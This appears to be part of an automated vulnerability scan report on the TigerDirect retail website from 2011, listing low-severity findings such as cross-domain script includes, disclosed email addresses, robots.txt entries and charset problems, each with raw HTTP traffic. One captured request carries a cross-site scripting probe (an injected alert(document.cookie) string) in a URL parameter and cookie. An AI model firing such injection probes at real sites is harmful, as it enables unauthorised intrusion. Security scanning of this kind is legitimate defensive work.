<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=2795126&sku=TSD-500AAKS&amp;cm_sp=Footer-_-Spot%2002-_-CatId_8_TSD-500AAKS" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=5650958&sku=D700-5052&amp;cm_sp=Footer-_-Spot%2003-_-CatId_35_D700-5052"><img src="http://images.highspeedbackbone.net/dealday/footer_D700-5052.jpg" alt="D-Link Wireless-N 150 Home Router" border="0" title="D-Link DIR-601 Wireless-N 150 Home Router - IEEE 802.11n, 4x 10/100 LAN Ports, 10/100 WAN Port, External Antenna"/></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=5650958&sku=D700-5052&amp;cm_sp=Footer-_-Spot%2003-_-CatId_35_D700-5052" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=4662424&sku=D29-1026&amp;cm_sp=Footer-_-Spot%2004-_-CatId_379_D29-1026"><img src="http://images.highspeedbackbone.net/dealday/footer_D29-1026.jpg" alt="Dane-Elec 8GB Capless <br>USB Flash Drive" border="0" title="Dane-Elec DA-ZMP-08G-CA-N4-R Capless USB Flash Drive - 8GB"/></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=4662424&sku=D29-1026&amp;cm_sp=Footer-_-Spot%2004-_-CatId_379_D29-1026" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=18657&sku=H450-8216&amp;cm_sp=Footer-_-Spot%2005-_-CatId_136_H450-8216"><img src="http://images.highspeedbackbone.net/dealday/footer_H450-8216.jpg" alt="Hitachi 250GB Mobile Hard Drive" border="0" title="Hitachi 0S02528 Mobile External Hard Drive - 250GB, USB 2.0, Black"/></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=18657&sku=H450-8216&amp;cm_sp=Footer-_-Spot%2005-_-CatId_136_H450-8216" class="info">MORE
INFO<img src="http://images.highspeedbackbone.net/frontproducts/greybubblearrow.gif" align="absmiddle" border="0" height="13" hspace="1" width="12" /></a>
...[SNIP]...
<a href="javascript:loadPage('browser', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/favorites2.gif" alt="Add to Favorites"></a>
               <a href="javascript:loadPage('del.icio.us', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/delicious.gif" alt="Add to del.icio.us"></a>
               <a href="javascript:loadPage('digg', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/digg.gif" alt="Add to Digg"></a>
               <a href="javascript:loadPage('reddit', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/reddit.gif" alt="Add to Reddit"></a>
               <a href="javascript:loadPage('furl', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/furl.gif" alt="Add to Furl"></a>
               <a href="javascript:loadPage('stumbleupon', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/su.gif" alt="Add to StumbleUpon"></a>
               <a href="javascript:loadPage('facebook', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/facebook.gif" alt="Add to Facebook"></a>
               <a href="javascript:loadPage('technorati', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/technorati.gif" alt="Add to Technorati"></a>
               <a href="javascript:loadPage('google', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/google.gif" alt="Add to Google"></a>
               <a href="javascript:loadPage('netscape', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/netscape.gif" alt="Add to Netscape"></a>
               <a href="javascript:loadPage('spurl', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/spurl.gif" alt="Add to Spurl"></a>
               <a href="javascript:loadPage('slashdot', title, description)"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/slashdot.gif" alt="Add to Slashdot"></a>
...[SNIP]...
<div style="width:187px; height:44px; float:left; text-align:left; background:url(http://images.highspeedbackbone.net/footerus/social/footer_social_tiger_twitter2.jpg) top left no-repeat;"><a href="http://www.twitter.com/tigerdirect" target="_blank" style="width:155px; height:44px; display:block;"></a>
...[SNIP]...
<div style="width:187px; height:44px; float:left; text-align:left; background:url(http://images.highspeedbackbone.net/footerus/social/footer_social_tiger_facebook2.jpg) top left no-repeat;"><a href="http://www.facebook.com/tigerdirect" target="_blank" style="width:155px; height:44px; display:block;"></a>
...[SNIP]...
<a href="http://www.tigerdirect.com/showme.asp" target="_blank"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/phone.gif" style="float: left; padding-right: 2px;"></a>
...[SNIP]...
<br /><a href="http://tigerdirect.iapplicants.com" target="_blank">Employment</a>
...[SNIP]...
<a href="http://www.tigerdirect.com/rss/index.asp">Deal Alerts via <img src="http://images.highspeedbackbone.net/main/icon_rss.gif" border="0"></a>
...[SNIP]...
<a href="http://www.tigerdirect.com"><img src="http://images.highspeedbackbone.net/footer/country_icons_18.gif" alt="TigerDirect.com" width="34" height="27" border="0" /></a><a href="http://www.tigerdirect.ca"><img src="http://images.highspeedbackbone.net/footer/country_icons_19.gif" alt="TigerDirect Canada" width="33" height="27" border="0" /></a><a href="http://www.misco.co.uk"><img src="http://images.highspeedbackbone.net/footer/country_icons_20.gif" alt="Misco UK" width="34" height="27" border="0" /></a><a href="http://www.misco.ie"><img src="http://images.highspeedbackbone.net/footer/country_icons_21.gif" alt="Ireland Misco" width="36" height="27" border="0" /></a><a href="http://www.misco.de"><img src="http://images.highspeedbackbone.net/footer/country_icons_22.gif" alt="Misco Germany Inc." width="35" height="27" border="0" /></a><a href="http://www.misco.at"><img src="http://images.highspeedbackbone.net/footer/country_icons_23.gif" alt="Misco Austria " width="33" height="27" border="0" /></a><a href="http://www.misco.ch"><img src="http://images.highspeedbackbone.net/footer/country_icons_24.gif" alt="Misco Switzerland" width="35" height="27" border="0" /></a><a href="http://www.misco.it"><img src="http://images.highspeedbackbone.net/footer/country_icons_25.gif" alt="Misco Italy Computers Suppliers S.p.A" width="32" height="27" border="0" /></a><a href="http://www.misco.fr"><img src="http://images.highspeedbackbone.net/footer/country_icons_26.gif" alt="Misco France" width="33" height="27" border="0" /></a><a href="http://www.misco.be"><img src="http://images.highspeedbackbone.net/footer/country_icons_27.gif" alt="Misco Belgium" width="35" height="27" border="0" /></a><a href="http://www.misco.nl"><img src="http://images.highspeedbackbone.net/footer/country_icons_28.jpg" alt="Misco Nederland BV" width="34" height="27" border="0" /></a><a href="http://www.misco.se"><img src="http://images.highspeedbackbone.net/footer/country_icons_29.gif" alt="Misco AB - Sweden" width="36" height="27" border="0" /></a><a href="http://www.misco.es"><img src="http://images.highspeedbackbone.net/footer/country_icons_30.gif" alt="Misco Iberia Computer Supplier SA - Madrid, Spain" width="35" height="27" border="0" /></a><a href="http://www.misco.pt"><img src="http://images.highspeedbackbone.net/footer/country_icons_31.gif" alt="Misco Iberia Computer Supplier SA - Madrid, Spain" width="36" height="27" border="0" /></a>
...[SNIP]...
<br /><a href="http://www.systemax.com/" target="_blank"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/systemax.jpg" alt="Systemax" Title="Systemax"></a>
                   <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.TIGERDIRECT.COM&lang=en" target="_blank"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/verisign.gif" alt="VeriSign Secured" Title="VeriSign Secured"></a>

<a href="http://www.seflorida.bbb.org/BusinessReport.aspx?CompanyID=27000500&source=ctc" target="_blank"><img src="http://images.highspeedbackbone.net/footerus/clickratingsm.gif" WIDTH="135" HEIGHT="52" BORDER="0"></a>

<a href="https://sealserver.trustkeeper.net/compliance/cert.php?code=ea97a8b6d8d755f41b78d04aa242d7f1&style=normal&size=105x54&language=en" target="hATW"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/trustwave_logo.gif" border="0" alt="Trusted Commerce" Title="Trusted Commerce"/></a>
                   <a href="http://www.bizrateinsights.com/2010-coe" target="_blank"><img src="http://images.highspeedbackbone.net/footer/BR_2010.gif" alt="Bizrate" title="Bizrate" /></a>
<img src="http://images.highspeedbackbone.net/footer/paypal_logo.gif" alt="PayPal" title="Shop Using PayPal" />
</div>
...[SNIP]...
</Script>


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

5. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /applications/SearchTools/item-details.asp HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 100748
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:06 GMT
Connection: close
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; path=/
Set-Cookie: SRVR=WEBX10%2D08A; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp&Referer=; path=/
Set-Cookie: SessionId=2683290720110129202406173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com

<!--V2-->
<!-- Your IP is:96.17.168.193-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, ne
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</Script>


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

6. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The following email addresses were disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /applications/SearchTools/item-details.asp HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 100748
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:06 GMT
Connection: close
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; path=/
Set-Cookie: SRVR=WEBX10%2D08A; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp&Referer=; path=/
Set-Cookie: SessionId=2683290720110129202406173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com

<!--V2-->
<!-- Your IP is:96.17.168.193-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, ne
...[SNIP]...
er your e-mail address in the Box');
fld.focus();
return false;
} else if (filter.test(fld.value) == false) {
alert('Sorry, please enter a valid e-mail address, for example, johnsmith@gmail.com');
fld.focus();
return false;
} else {
return true;
}
}


function get_random()
{
var ranNum= Math.floor(Math.random()*4);
   return ranNum;
}


function getaQuot
...[SNIP]...
ument.ccExForm.email;
       var at="@"
       var dot="."
       var lat=str.indexOf(at)
       var lstr=str.length
       var ldot=str.indexOf(dot)
       alertxr = "Sorry, please enter a valid e-mail address, for example, johnsmith@gmail.com"
   
       if (str.indexOf(dot)==-1 || str.indexOf(dot)==0 || str.indexOf(dot)==lstr){
        alert(alertxr);
           lightbox("open");
           emailID.focus();
        return false
       }

        if (str.indexOf(at,(
...[SNIP]...
alid email confirmation, please allow up to 2-4 business days to receive your $10 discount via email. Must follow instructions within the email to qualify. To ensure delivery to your inbox, please add TigerDirect@tigeronline.com to your address book.
</div>
...[SNIP]...
alid email confirmation, please allow up to 2-4 business days to receive your $10 discount via email. Must follow instructions within the email to qualify. To ensure delivery to your inbox, please add TigerDirect@tigeronline.com to your address book.
</div>
...[SNIP]...

7. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.tigerdirect.com

Response

HTTP/1.0 200 OK
Content-Length: 112
Content-Type: text/plain
Last-Modified: Fri, 24 Jul 2009 20:02:38 GMT
Accept-Ranges: bytes
ETag: "a3c6d8b199cca1:7313"
Server: Microsoft-IIS/6.0
X-SV: MIA05B
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:24:09 GMT
Connection: close

# Allow all

User-agent: *
Disallow: /cgi-bin/
Disallow: /cgisec/
Disallow: /profiles/
Disallow: /email/

8. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /cgi-bin/icart.asp

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /cgi-bin/icart.asp HTTP/1.1
Host: www.tigerdirect.com
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; visited=tempyes; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; SRVR=WEBX10%2D07A; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SRCCODE=WEB1101; SSLB=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 29 Jan 2011 15:14:42 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:14:42 GMT
Connection: close
Set-Cookie: SRCCODE=WEB1101; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/
Set-Cookie: SRVR=WEBX12%2D06B; path=/
Content-Length: 1476


<HTML>
<HEAD>
<TITLE>Your TigerDirect.com Shopping Cart</TITLE>
<META NAME="Generator" CONTENT="EditPlus">
<META NAME="Author" CONTENT="">
<META NAME="Keywords" CONTENT="">
<META NAME="Descrip
...[SNIP]...

9. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tigerdirect.com
Path:   /secure/captcha/JpegImage.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /secure/captcha/JpegImage.aspx HTTP/1.1
Host: www.tigerdirect.com
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/secure/captcha/Default.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; visited=tempyes; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SSLB=0; SRCCODE=WEB1101; SRVR=WEBX12%2D06B; ASP.NET_SessionId=kjgyls45inwxcw55ezidnd45; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44&CaptchaTextVal=9895C6C99F6C

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: image/jpeg; charset=utf-8
Content-Length: 7487
Date: Sun, 30 Jan 2011 15:14:42 GMT
Connection: close

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......d...."..............................
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Sun Jan 30 11:14:12 CST 2011.